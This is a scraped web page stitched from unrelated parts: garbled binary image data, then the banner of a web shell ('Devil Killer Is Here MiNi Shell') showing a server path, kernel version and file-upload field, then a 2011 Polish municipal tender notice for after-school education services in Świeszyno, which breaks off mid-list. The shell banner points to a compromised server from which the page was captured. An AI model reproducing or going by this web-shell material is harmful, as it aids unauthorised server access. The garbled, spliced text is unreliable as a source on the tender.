JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111119/386966-N-2011.html

<p class="kh_header"><b>Świeszyno: Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III, w szkołach podstawowych Gminy Świeszyno</b><br>
<b>Numer ogłoszenia: 386966 - 2011; data zamieszczenia: 19.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 94 31 60 120, faks 94 31 61 491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.swieszyno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III, w szkołach podstawowych Gminy Świeszyno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług edukacyjnych rozumianych jako prowadzenie dodatkowych zajęć pozalekcyjnych dla uczestników projektu Nr KSI WND-POKL.09.01.02-32-106/11 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III, w szkołach podstawowych Gminy Świeszyno, w okresie 05.12.2011 r. - 15.06.2012 r. 2. Celem głównym projektu jest wsparcie w okresie jego realizacji indywidualnego rozwoju uczniów klas I-III we wszystkich szkołach podstawowych Gminy Świeszyno, dostosowane do zdiagnozowanych potrzeb edukacyjnych uczniów oraz ich możliwości psychofizycznych. Cele szczegółowe projektu to Zapewnienie w okresie realizacji projektu w szkołach Gminy Świeszyno, każdemu dziecku klas I-III objętemu wsparciem w ramach projektu, oferty edukacyjno - wychowawczo - profilaktycznej, zgodnej z jego indywidualnymi potrzebami, możliwościami edukacyjnymi i rozwojowymi, Zwiększenie w okresie realizacji projektu dostępności i podniesienie jakości wsparcia i pomocy psychologiczno - pedagogicznej w formie zajęć dla dzieci z trudnościami i zaburzeniami rozwoju, a w szczególności ze specyficznymi i specjalnymi potrzebami edukacyjnymi, Zminimalizowanie specyficznych trudności w uczeniu się, u co najmniej 50% dzieci objętych w ramach projektu zajęciami specjalistycznymi. 3. Dodatkowe pozalekcyjne zajęcia wchodzące w skład zamówienia przeznaczone są dla uczniów Szkoły Podstawowej w Dunowie, Szkoły Podstawowej w Konikowie, Szkoły Podstawowej w Niedalinie, Szkoły Podstawowej w Zegrzu Pomorskim i prowadzone będą na terenie w/w szkół w systemie pozalekcyjnym, gdzie przez jedną godzinę zajęć rozumie się 45 minut. 4. W czasie każdych zajęć uczestnicy projektu uczeni będą szacunku do odmienności i różnic wynikających z płci. Przekazana będzie wiedza na temat niezależnego od płci, spektrum możliwych wyborów życiowych oraz równości szans kobiet i mężczyzn w życiu społecznym. 5. Ze względu na miejsce odbywania zajęć oraz ich specyfikę zamówienie podzielone jest na 18 części. Wskazuje placówkę, w której realizowane będą zajęcia, liczbę godzin realizacji danego zajęcia i liczbę grup: ZAJĘCIA REALIZOWANE W SZKOLE PODSTAWOWEJ W DUNOWIE: Część nr 1 - Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 30 godzin prowadzonych w 1 grupie. Część nr 2 - Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 30 godzin prowadzonych w 1 grupie. Część nr 3 - Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 30 godzin prowadzonych w 1 grupie. Część nr 4 - Zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej - 30 godzin prowadzonych w 1 grupie. Część nr 5 - Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy - 30 godzin prowadzonych w 1 grupie. Część nr 6 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych - 30 godzin prowadzonych w 1 grupie. ZAJĘCIA REALIZOWANE W SZKOLE PODSTAWOWEJ W KONIKOWIE Część nr 7 - Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 60 godzin, prowadzonych w 2 grupach po 30 godzin w każdej grupie. Część nr 8 - Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 30 godzin prowadzonych w 1 grupie. Część nr 9 - Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 30 godzin prowadzonych w 1 grupie. Część nr 10 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno - przyrodniczych - 30 godzin prowadzonych w 1 grupie. Część nr 11 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk chemiczno - fizycznych - 30 godzin prowadzonych w 1 grupie. Część nr 12 - Zajęcia rozwijające uzdolnienia artystyczno - teatralne - 30 godzin prowadzonych w 1 grupie. ZAJĘCIA REALIZOWANE W SZKOLE PODSTAWOWEJ W NIEDALINIE Część nr 13 - Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 30 godzin prowadzonych w 1 grupie. Część nr 14 - Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 30 godzin prowadzonych w 1 grupie. Część nr 15 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych - 30 godzin prowadzonych w 1 grupie. ZAJĘCIA REALIZOWANE W SZKOLE PODSTAWOWEJ W ZEGRZU POMORSKIM Część nr 16 - Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 30 godzin prowadzonych w 1 grupie. Część nr 17 - Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 30 godzin prowadzonych w 1 grupie. Część nr 18 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych - 30 godzin prowadzonych w 1 grupie. 6. Opisane w zamówieniu zajęcia będą realizowane bezpośrednio po obowiązkowych zajęciach lekcyjnych. 7. Bezpośrednim realizatorem usługi (Wykonawcą) może być osoba, która posiada wykształcenie kierunkowe i praktykę oraz stworzy program (na podstawie właściwych założeń projektowych) obejmujący tematykę zajęć. 8. Wykonawca będzie dokumentował prowadzone zajęcia i frekwencję uczniów w dzienniku zajęć pozalekcyjnych w sposób uzgodniony z koordynatorem projektu. 9. Wykonawca będzie zobowiązany do: 1) opracowania i przedstawienia do akceptacji dyrektorowi szkoły oraz koordynatorowi projektu programu zajęć, który będzie zawierał propozycję działań w zakresie zdiagnozowanych problemów i potrzeb uczestników projektu, w terminie 7 dni od dnia zawarcia umowy. Na wniosek Wykonawcy dyrektor szkoły udostępni diagnozę dotyczącą problemów i potrzeb uczniów uczestniczących w zajęciach objętych niniejszym zamówieniem, 2) opracowania, w porozumieniu z dyrektorem szkoły i bieżącego prowadzenia kart obserwacji uczniów i innej dokumentacji dotyczącej mierzenia rezultatów Projektu, zapisanych we wniosku o dofinansowanie Projektu, 3) sporządzenia opinii o dzieciach objętych wsparciem - na początku i końcu projektu, 4) gromadzenia wytworów pracy uczestników projektu, 5) przestrzegania zasady równości szans, w tym równości płci w czasie realizowanych zajęć dodatkowych w ramach realizacji przedmiotu zamówienia, 6) opracowania szczegółowego harmonogramu prowadzenia zajęć dodatkowych, uzgodnionego z dyrektorem szkoły i przez niego zatwierdzonego, w terminie 7 dni od dnia zawarcia umowy. Zmiany w zatwierdzonym harmonogramie mogą następować tylko i wyłącznie w porozumieniu i po pisemnej akceptacji dyrektora szkoły, i nie wymagają zawarcia aneksu do umowy. Wykonawca ma obowiązek pisemnego poinformowania Zamawiającego o wszelkich zmianach w realizacji harmonogramu zajęć. Harmonogram zajęć nie może kolidować z obowiązkowymi, nadobowiązkowymi i dodatkowymi zajęciami szkolnymi uczniów objętych projektem. 10. Wykonawca będzie prowadził na bieżąco karty ewidencji czasu pracy wskazujące liczbę zrealizowanych godzin zajęć. Karty ewidencji czasu pracy będą składane w ostatnim tygodniu marca 2012 r. i czerwca 2012 r. u koordynatora projektu, po zatwierdzeniu przez dyrektora szkoły. 11. Rozliczenia finansowe dokonywane między Zamawiającym a Wykonawcą dokonywane będą w polskich złotych (PLN) w dwóch płatnościach: - płatność I - do 31 marzec 2012 r. - płatność II - do 30 czerwiec 2012 r. 12. Dyrektor szkoły udostępni Wykonawcy pozostające na wyposażeniu Szkoły programy, materiały edukacyjne, sprzęt i pomoce dydaktyczne, z których osoba prowadząca zajęcia będzie korzystać celem uatrakcyjnienia zajęć i podniesienia ich jakości.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga uprawnień określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. Nr 50, poz. 400). W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć Poświadczone przez Wykonawcę za zgodność z oryginałem kopie dokumentów potwierdzających posiadanie kwalifikacji określonych dla realizacji zadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonywana będzie na podstawie aktu nadania stopnia awansu zawodowego nauczyciela dla części 1,3,5,6,7,9,10,11,12,13,15,16,18 i na podstawie opisu doświadczenia w realizacji zajęć dla części 2,4,8,14,17.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby, które będą uczestniczyć w wykonaniu zamówienia tj. prowadzić zajęcia, muszą posiadać kwalifikacje do nauczania w szkole podstawowej określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. Nr 50, poz. 400), posiadać wiedzę i doświadczenie udokumentowane aktem nadania stopnia awansu zawodowego lub opisem doświadczenia w realizacji zajęć, a w szczególności: Część 1 zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 2: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe kierunkowe w zakresie logopedii, z przygotowaniem pedagogicznym lub wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym + studia podyplomowe kierunek logopedia oraz doświadczenie w prowadzeniu zajęć z zakresu terapii logopedycznej oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 3: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 4: zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej.- warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe kierunkowe w zakresie resocjalizacji lub wykształcenie wyższe z przygotowaniem pedagogicznym + studia podyplomowe lub kurs kwalifikacyjny socjoterapia, resocjalizacja lub kurs socjoterapii oraz doświadczenie w prowadzeniu zajęć z zakresu socjoterapii. Część 5: zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe lub licencjackie kierunkowe (wychowanie fizyczne) z przygotowaniem pedagogicznym + kwalifikacje do prowadzenia gimnastyki korekcyjno-kompensacyjnej lub wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej) + studia podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 6: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje 1 osobą, która będzie prowadziła zajęcia posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej) oraz stopień awansu zawodowego co najmniej nauczyciela mianowanego. Część 7: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 8: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe kierunkowe w zakresie logopedii, z przygotowaniem pedagogicznym lub wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej)+ studia podyplomowe kierunek logopedia, doświadczenie w prowadzeniu zajęć z zakresu terapii logopedycznej oraz stopień awansu zawodowego co najmniej nauczyciela mianowanego. Część 9: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 10: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje 1 osobą, która będzie prowadziła zajęcia posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej); ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 11: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk chemiczno-fizycznych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 12: zajęcia rozwijające uzdolnienia artystyczno - teatralne warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne, minimum licencjat lub studium wychowania przedszkolnego, nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 13: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne w zakresie nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia z zakresu pracy z dziećmi ze specyficznymi trudnościami w nauce oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 14: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne w zakresie nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej) + studia podyplomowe kierunek logopedia; doświadczenie w prowadzeniu zajęć z zakresu terapii logopedycznej oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 15: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne w zakresie nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej); ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela kontraktowego. Część 16: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne w zakresie nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej), ma ukończone formy doskonalenia w zakresie pracy z dzieckiem w wieku wczesnoszkolnym oraz stopień awansu zawodowego, co najmniej nauczyciela kontraktowego. Część 17: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne w zakresie nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej) + studia podyplomowe kierunek logopedia; doświadczenie w prowadzeniu zajęć z zakresu terapii logopedycznej oraz stopień awansu zawodowego, co najmniej nauczyciela mianowanego. Część 18: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych - warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że sam posiada lub dysponuje minimum 1 osobą, która będzie prowadziła zajęcia, posiadającą wykształcenie wyższe pedagogiczne w zakresie nauczania początkowego (nauczania zintegrowanego, edukacji wczesnoszkolnej) lub wykształcenie wyższe kierunkowe, przygotowanie pedagogiczne i kwalifikacje do nauczania przyrody oraz stopień awansu zawodowego, co najmniej nauczyciela kontraktowego. W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć: Poświadczone przez Wykonawcę za zgodność z oryginałem - kopie dokumentów potwierdzających posiadanie kwalifikacji określonych dla realizacji zadania, - kopię aktu nadania stopnia awansu zawodowego dla części 1,3,5,6,7,9,10,11,12,13,15,16,18, opis posiadanego doświadczenia w realizacji zajęć dla części 2, 4, 8, 14, 17 zadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
